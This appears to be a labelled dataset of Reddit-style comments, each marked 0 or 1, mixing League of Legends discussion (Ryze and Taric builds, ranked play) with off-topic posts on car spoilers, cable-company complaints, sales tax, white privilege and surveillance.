1	Hey all, I'm a longtime Ryze player, wanted to weigh in with my findings.   First of all, anyone who says that Q-W... is Ryze's best combo is dumb.  It's a common combo, yes, because you frequently need to root, but if you happen to have the time to Q-E-Q-W, then the MR shred by your E makes it the obvious damage winner.  I know that 1v1's and skirmishes make you W early, but in most teamfights (and SOME small fights) you can get off the Q-E (and R in the air).  Maybe you already knew this though, because the focus of this discussion is single-target.   Have to point this out though, your max dps combo is not great.  In your second rotation, after the R (which is instant, no cast time) you could have also cast an E, which would have made your Q be up so the entire combo would be Q-ER-Q-AA.   About fitting basic attacks into your damage rotation...early game yes, late game no.  Although for the sake of discussion, if you have Muramana, then you'll want to throw in a basic attack after two spells, so a quick Q-W-AA, Q-E-AA, Q-R-Q-W-AA would be a realistic fight.   Now to my impressions using the items...Muramana makes you have beast damage and makes your 1v1s even more formidable.  However, that is already a strength of Ryze.  The people that you lose 1v1s to, you will still probably lose them.  The people that you beat 1v1, well you might just be able to stomp them and snowball around to make it worth it.   Seraph's was always in my build as Archangels, and now we have the shield.  My usual Ryze is RoA-FH-WotA-Abyssal Scepter-Seraph's, with Furor Sorc boots.  This Ryze is the "tanky" ryze except with AS to offset the overall low amount of magic pen whilst not sacrificing MR.  I'm never giving up my spell vamp.  Now I have the best turns ever, I've won a few key games by turning, shielding up, Q-ER-Q-W-Q blasts a team and I vamp up 50% of my health before the shield falls.   So for my Ryze, the choice is clear.  To be fair, if there's ever a game where I don't need MR, I will get the second tear for Muramana right after I finish Seraph's.  But otherwise Seraph's is the item for me.   Now I want to look for the situation where Muramana is better.  If Muramana is doing more for you, that means you're doing a lot of fights without your ult, okay, so there's less spellvamp for you.  You're using a lot of time when your spells are on cooldown to autoattack, which means that on an already not-very-mobile champ, you're being less mobile and trying to spend 100% of your time sitting and damaging.   Overall, it seems that Muramana is an item for domination in early- and mid-game phases.  For laning, for lane ganks, yes, Muramana makes you so damn scary.  Otherwise, your primary focus is teamfights and you won't be getting the 1v1, 2v2 skirmish-type fights you need to shine with the increased burst that Muramana gives you.  And that's very much it, Muramana's is good only in specific situations.  Seraph's gives you it's own boost there but is also more synergistic with Ryze's kit, especially his ult.  The shield is arguably the most epic thing to ever happen to Ryze (and Singed, mwahahahahah), so I can't underestimate that.
1	I think duo-ing greatly increase your chance of winning. You get at least 2 solid players that can play decently.   I'm currently trying to get higher by playing duo as much as possible
1	It's not though. Gambler's Fallacy is the probability of an outcome in a given moment of time.   Winning a series is a collection of outcomes. If you win exactly 50% of your games, each game has a 50/50 proposition. But you only have a 1/8 chance of knowing the exact outcome and order of the three games.   You have a 1/8 chance of being correct for the series, but a 50/50 chance for each game. And the more events you add, the less,  exponentially  less, chance you have of being correct. That's why the Tier promo, a 5-game event (4/6 if you count getting to the damned thing) is much more difficult.
0	Now see,  this  is the right way to think. Sorry for assuming you were trying to prove me wrong, you were only playing devil's advocate which was honestly what I was doing to the original commenter in the first place. I was originally attempting to show him that not only the "liberal drones"/"Democrat extremists" would go off and do something as drastic as shooting someone over something trivial.
0	Actually it does help!  It gives almost as much benefit as a RWD car.  You're not using it for traction when you're accelerating as you won't be going fast enough to see any benefit from the downforce at the lower speeds that you would have issues with traction (unless your car is ridiculously powerful and spins at 140km/h+).   At higher speeds, no matter your drive type, the ass end of your car is going to be generating lift and will start to skid or just break free at high speed turns (and even straights).  Spoilers counteract that lift and will help suck your ass end to the road and let you be able to corner faster and safer.   In the end, most people with the high spoilers are just idiots using them for show that never (if rarely) reach the speeds that will actually provide downforce.  Honda, GM, Dodge, Toyota - they don't just put high spoilers on their FWD cars for nothing.  They've done the tests and put in the track time.   I had my low rise spoiler off of my SS for one track run  and definitely felt my ass end skidding at on the 160km/h turns.  Swapped the high rise on it and it made the turns much more manageable.
1	Makes me even more mad that she was under 50% when her nerfs we're made. And she wasn't constantly picked at the pro level either. Often they nerf low winrate champs because of pros, but not Vi. They nerfed her even with bad winrate and little pro use. Such a shame.
1	I went to a convention in highschool and there was a dance the last night. My mates and I all went. After an hour or so I got hungry. I knew they had gummi bears in bulk at the snack bar in the lobby. "Gummi bears is a brilliant idea I thought." So I bought a bag, ate some and put them in my pocket. Went back to dancing with some cute girl I had been flirting with all day. She mistook the gummi bears for an erection, got freaked out and walked the fuck away. I found out the next day.
1	Paying customers deserve a sense of entitlement, we are the ones funding their game. Our input is critical to the success of their business model, they still make money from you playing, regardless if you spend RP or not: You're giving them publicity by adding to their growing playerbase.   Not to mention their sponsored events will take into account the numbers of players they have and will pay Riot accordingly. i.e: Oh, we have  X  amount of users who are going to be notified you're sponsoring this event, we want this amount of money.   Riot did sell out though, when they sold off to that Korean company: Since then, they have been producing new champions each week. Each for 975RP and each of them completely overpowered for the game mechanics, which is why people buy them, for that edge over the game until the next patch. Don't let them fool you, they are making a lot of money, if they weren't: They simply wouldn't continue hosting the game.   Now, when people start bashing on Riot on the forums because of some down time or something like that: That's wrong. People shouldn't do that, but complaining over something they expect you to buy with RP and not being able to have it permanently, yeah, that's justified.
0	My dad used to be a service manager for a well known cable company.   He once told me a story about an older gentleman that would call every month to complain about his service and his bill, it never escalated to my dad because the call center representative would aways offer a discount and it would appease the complaint, it would get documented and that was that.   Well, one day this guy calls and he gets a new guy that was extremely well trained in customer service, before offering anything the new guy went through the older gent's service history and started making deductions, he noticed that this had been going on for quite literally YEARS, with only 1 or 2 month gaps between some phone calls, and the end result was always a $20 credit on his next bill, he also noticed a trend in the complaints about spotty service or loss of internet signal, but never made a request to have it fixed.   The service call representative offered the same solution to appease the customer, then escalated it to the Service manager (my dad). The service manager read through the case notes and found the exact same information the call representative found.   Anybody who knows my dad knows he is a logical and restrained man who can call a bluff from 10 miles away. My dad calls the customer (from hence forth we will call him Mr. Smith, and my dad John) to proceed with a "routine follow up."   The phone call went something like this:   My dad:  "Hello Mr. Smith, My name is John, I work with ABC cable company, I noticed a recent complaint with your service, and wanted to make a follow up with you to make sure the issue has been resolved or to send a technician to your house for inspection, free of charge"   Mr. Smith:  "Oh, the problem has been resolved; the man I dealt with over the phone fixed the issue."   My Dad:  "Im glad to hear that; my concern is that I see a long case history of complaints but we never dispatched a technician, I wanted to go more in depth with these problems to make sure we can make you a satisfied customer, so we don't have to inconvenience you with a phone call every few months due to problems with your service.   Mr. Smith:  "that won't be necessary."   My dad:  "alright then, next time you have any problems please feel free to call me at  Gives phone number ""   The conversation ends, and nothing comes of it. But... were not done here yet, 1 month later, this ballsy guy calls in again. What Mr. Smith doesn;t know is my dad flagged his account, the next customer service rep sees the issue and automatically reroutes the call to my dad. This phone call goes like this.   My Dad:  "Thank you for calling ABC cable company, my name is John; what can I help you with today?"   Mr. Smith: "My cable service has been very poor this month, I lost my internet service 3 times in the past week, and lost television service during multiple sporting events."   My dad:  "I am sorry to hear that, I would be happy to send a technician out to your residence to find the source of the problem and see if we can resolve the problem."   Mr. Smith:  "that won't be necessary, I would like another solution."   My dad:  "Please hold, let me check your service history."   My dad knows very well that Mr. Smith has had no signal interrutions, he pulled the service history of that neighborhood and found not one loss of signal or outage in that area in the past few years, based on Digital signal data, and Mr. Smith seems to be the only one complaining about service.   My dad takes Mr. Smith off of Hold: "well Mr Smith, I reviewed the signal to your house and found very strong signal, I also checked the neighboring houses for any known issues in that district node and found no loss of signal to any of your neighbors either. I also noticed you have complained about service every month for the past few years, at this point my supervisor has instructed me to offer to send a technician for a line inspection, or we can choose to disconnect your service and refer you to one of the other television service providers in your area."   Mr. Smith:  "nevermind."  Promptly hangs up the phone   My dad nor did any other call center representative ever heard from him again, and he never canceled his service either. Believe it or not, you can be black listed by Cable companies; Companies like Charter or XFinitiy or Bright-house can choose to deny you service if you are repeatedly a problem or an issue to their customer service representatives.   While I agree with OP (and my dad probably would as well) that cable companies are scummy, and over charge for their services, they can still make you their bitch by just denying you service.
0	No, this is not what "white privilege" means, and anyone suggesting the color of your skin makes you immune to bad shit is fucking stupid. White privilege means that as a result of hundreds of years of history and culture, the fact that you are white grants you status in a lot of situations. It means that you are generally the benefactor of a shit-ton of cultural, political, economic, and historical policy. It means, for example, that you are more likely to be hired for a job than a similarly-qualified non-white person, more likely to earn a higher income than that same similarly qualified non-white person, and less likely to face discrimination at the same level as a non-white person. I say "likely" because, again, white skin is not a free pass. It's just a highly discounted one.   Here's an example of the moment I realized what white privilege meant to me. I am American but ethnically Portuguese, i.e., Western European. To most people I've encountered in my life (including myself), this counts as "white." However, there's a good number of people that lump Portuguese in with Hispanic or Latino, particularly in areas where there are huge Portuguese/Brazilian/Latino immigrant populations. For me, this has meant that my location relative to such a community has been known to determine whether people see me as white or not--when I'm hanging out in the suburbs, I'm white. When I'm places like Newark, NJ (particularly in the Ironbound) or Elizabeth, NJ--places with huge Portuguese/Brazilian/Latino immigrant communities--I'm no longer white.   I realized what white privilege was when I got into an argument with a professor who was insisting I was Latina because my parents speak a "Latin" language. No, I said, I was white--I was about as western European as one can get, just because my parents speak a romance language (of which some are spoken by people considered non-white) didn't make me non-white. I'm white. No no no, says the professor, you're Latina. Americans don't even know the difference between Portuguese and Spanish anyway, you are definitely Latina.   So this went on for a while and I was getting pretty upset and offended trying to "prove" my whiteness, when it occurred to me--who the fuck cares? And why the fuck do  I  care whether this dude thinks I'm white or not? Why is "being white" something I feel like I have to defend or prove when it's called into question? WHY IS THIS SUCH A FUCKING BIG DEAL? And then I realized: it wasn't just "being white" that was called into question, it was my access to the resources, status, and everything that goes along with "being white" that was being doubted. And  that  is why I got so up in arms trying to defend and prove my whiteness. In a perfect world, it wouldn't fucking matter what color you were, but we don't live in a perfect world, and on some level, I recognized this in my fight to be recognized as "white" even though at the time I didn't actually know  why  I was doing it.   That is what "white privilege" is. You don't even realize what an impact it has on your life until the possibility that it might get taken away arises.
1	start of season i got past gold in my first 10 games, i didn't want to play anymore and kept it. then i got bored and queued again, after 20 matches hit 1700. currently stuck 1800s ~200 ranked games played.
1	My problem with building a new passive on Taric is that he's already quite strong.  He was originally designed as a fighter type instead of a support, and while the ult didn't carry over from that idea, the passive did.  It doesn't function in his primary role as a support, but any realistic change to his passive would be a buff, since it's really almost never relevant.  Sans hybrid/bruiser/jungler/non-support items, he doesn't attack fast enough to get regularly relevant cdr on his heal (yes, people get clutch heals sometimes, we're talking consistent help), and the mana he gets back from the hits are kinda pathetic.  The mana regen is even smaller than Kassadin's passive on his dinky little sword buff, and Taric's heal is pretty mana inefficient, considering the more popular healers like Soraka or support Kayle.  Most Taric players smack people for the damage and pretty much get mana only from towers or dragon, because pushing is not worth it and champions are better killed than leeched for mana.
1	It would be a civil case under the Computer Fraud and Abuse Act (CFAA). Prior to 2008 you needed to prove it caused over 5k in damages, now you would just have to prove damages but loss of potential gain is a hard case to make. That said you could probably get something but it would likely not be worth the time and effort.
0	I hate that this myth is so pervasive and persistent in our culture. Exercise doesn't magically negate the effects of poisoning your body. You might look healthy on the outside, but you are still killing yourself. Most people understand that you can't just exercise to counteract the effects of smoking. No one would say, "You just consumed arsenic? You better go for a run!" Why do people, then, think it is different when it comes to alcohol and crappy food?
0	Exactly. It's just my opinion,, so who fucking cares? And whether or not people I've never met believe or don't believe that i've had some immensely hot girlfriends doesn't change the fact that it's true.
1	The reason DoTa could easily implement duplicates is because it started from Warcraft and the champs were units in Warcraft which could be duplicated and thus code had to be in place to account for this. Since LoL has had the assumption of unique champs on a team from the beginning the process of allowing multiples would require a code review of essentially the entire game.
0	I'm not defending the system. I think they probably could do it. But for anyone who's curious, here's the reason why the taxes aren't on the sticker.   There are literally tens of thousands of administrative divisions in the United States. Every single one of these can levy a sales tax. That means states, counties, cities, school districts, and even individual shopping areas. (For example, a city will often encourage a new shopping mall or big store to come in by designating a "special business district" with lower sales taxes.) In addition, there are different taxes for different types of items. In some states, cities, towns, school districts, malls, etc., food may be taxed at a different level then TVs. Your method of payment may also affect the taxes. For example, it is illegal in the United States to charge sales tax to people using EBT cards (food stamps). In some places, purchases on gift cards do not incur sales tax. There are also certain days and times of the year when certain cities, counties, or states have a "sales tax holiday," when no sales tax is charged. This often falls right around the beginning of the school year to allow parents to purchase their children's school supplies for cheaper. Due to the fact that tax can change from state to state, county to county, city to city, school district to school district, mall to mall, day to day, method of payment to method of payment, and even from one shelf to the next, it makes it very impracticable to print the sales tax on the sticker price, because in many cases, it is literally impossible to know what the sales tax will be until the item is brought up to the counter for checkout. Another issue to keep in mind is that, due to varying sales tax rates, companies would not be able to advertise prices. Apple advertises an iPhone for $199. McDonald's advertises a McDouble for $1. What are they supposed to do? Make a commercial for Columbia, Missouri, where the McDouble might be $1.07? And then another commercial for Tulsa, Oklahoma, where the McDouble might be $1.09? And then another for every McDonald's in the entire country, all of which may be subject to different tax rates?   Again, I'm not trying to defend the system. It's probably feasible, at least on most products. But I'm just giving the reason why. It's not some scam to try to fuck you over. And, while I understand that it's more convenient and may be surprising to foreigners visiting North America (after all, I lived in Germany and much preferred their straightforward system), it's not some big scandal like you make it out to be. We all get used to it. We don't feel cheated. We understand that prices are going to be higher when it comes to checkout. We don't bitch about driving on the left in Australia or using the "rounds" system in Ireland or the way the entire country of Spain thinks it's proper to take a damn nap in the middle of the day. It's just a difference, and there's a good reason for it, and there's no reason to get up in arms about it.
1	this dude assume the community dont try new thing and does not ask themselve question enough about these new thing and that we need in depth discussion about every aspect of the game to come up with a true answer to all these question...   hes belitteling people intellect   we do not need in depth discussion and exploration /experimentation to figure out why taric top( his prime exemple) isnt optimal in a soloqueu scenario... we really dont   and we alrdy have a reddit for these discussion wich is fine.   im ok for super in depth discussion about team comp and strategy but arguing for hour about a single champion build without context is plain ridiculous and pointless. Thinking about it is fine figuring it out by yourself is fine theyres no need to start a topic on such matter IMO.   its like discussing on whos the strongest pokemon... do you realize how stupid and horrible this is.And even there its more interesting then discussing champion in lol cause its more complex..and much more ez to analyze ... you can come out with very solid argument in pokemon discussion cause it can all be simulated and theorized lol cannot be...you can tell me you 50 game with taric top and you foudn out he was really good vs x if played this way ... ok what does it mean really.   its not arceus.   its like discussion wich item is better for x champion... too much variable does not compute.. theyres alway better item but tbh its all situational. we could go ahead and analyze every situation and decide on wich way to build according to each situation in the best way possible in theory... i mean ok or we could just use our brain during a game an chose among a set of item that are better for x and x situation instead of wasting time discussing and theoryzing something as dynamic as a lol game... the base of lol are simple.... we all know whats more optimal in theory,... but in pratice its much more different..
0	Here is a defense: this is a shit meme that is repeated every time r/atheism is brought up. "I'm an atheist but I'm not one if those atheists." When people post that what are they looking for? A pat on the back from Christians? A "good job, you are so tolerant for unsubscribing?" It's a way to have a superiority complex.   The other defense I have is: in my daily life I run across a lot of pro-Christian shit. From the Christmas music that is on repeat at work (the Jesus-y kind), to random "this is time for a prayer" situations, to random strangers telling me about their faith, to older relatives constantly sending me Jesus chain letters. In America, Christians have a lot of privilege. They get to flaunt their beliefs without most people second guessing it.   Now, I'm not an anti religious atheist. I'm not angry about the Christian shit I deal with. But when people start complaining that one subreddit on one website is "intolerant" or acting like "atheist assholes" you have to really look at the bigger context and ask yourself "is this really that big of a deal?" It's about a big of a deal as Grandma's chain letters.   Sorry for the rant... Uh
0	To me, that's still disturbing.  I don't mean any disrespect, but I almost feel like this 'I expect it' is a learned helplessness response I hear from a lot of people.   Even if a technology exists to do it, I want to believe a first world government won't do it  (at least on a mass scale) if the people outlaw it.  And that we can put oversight in place to create accountability around that.  Or we should all begin using encryption technologies to make sure it's not done.   Not because one necessarily plans to commit a crime but because that's not the ultimate threat of surveillance like this imo.   Here in the states, they're building a massive server farm not just to snoop, but to store all of this.  Indefinitely.  I don't know if that's the case in the UK.   But that's basically like building a dossier on everyone.  As technology increases it could be cross-referenced with all kinds of other information, cctv and offline records.  To create not just useful personal profiles but group profiles, behavioral profiles, all kinds of nasty things.   For example, over the course of a life I'd hazard we all do something wrong or embarrassing or indiscreet or unethical at some point.  In a world where everything is recorded and scrutinized (for some people from birth), that dossier is now a tool for control.   What if laws change or the powers that be want to criminalize former freedoms?  How much easier to know who'll give you the most pushback and target them with a lifetimes correspondence keyword searched in moments?   Or - and I'm in marketing so I know this is true - what if they just want to exploit it for profit and influence?  The aggregated information of millions, if deep enough, can be used to shape the way people think en masse, to manipulate their choices and funnel their decisions into a finite set of prescribed outcomes a power might want to guide you towards.
0	I was in a thread where that was announcing the new DLC in  X  game was available in the US for download, and the dude was commenting on every single comment and repeating the same info. It pissed several people (including myself) off.
0	It's not necessarily racist to be more or less attracted to certain races.  It is racist to say "she's pretty cute for a black chick," since you're not technically saying what you personally find attractive, but instead making a statement about what is and is not attractive re: people as a whole.
0	Just because society believes that there is a great white spaghetti monster in space that loves them it doesn't mean that there is a great white spaghetti monster in space that loves them.   Just because someone believes that guns should be made illegal because it would make the world safer does not actually mean that gun control makes people safer.   Just because a majority of people believe that being fat is terrible doesn't mean I should hate myself.
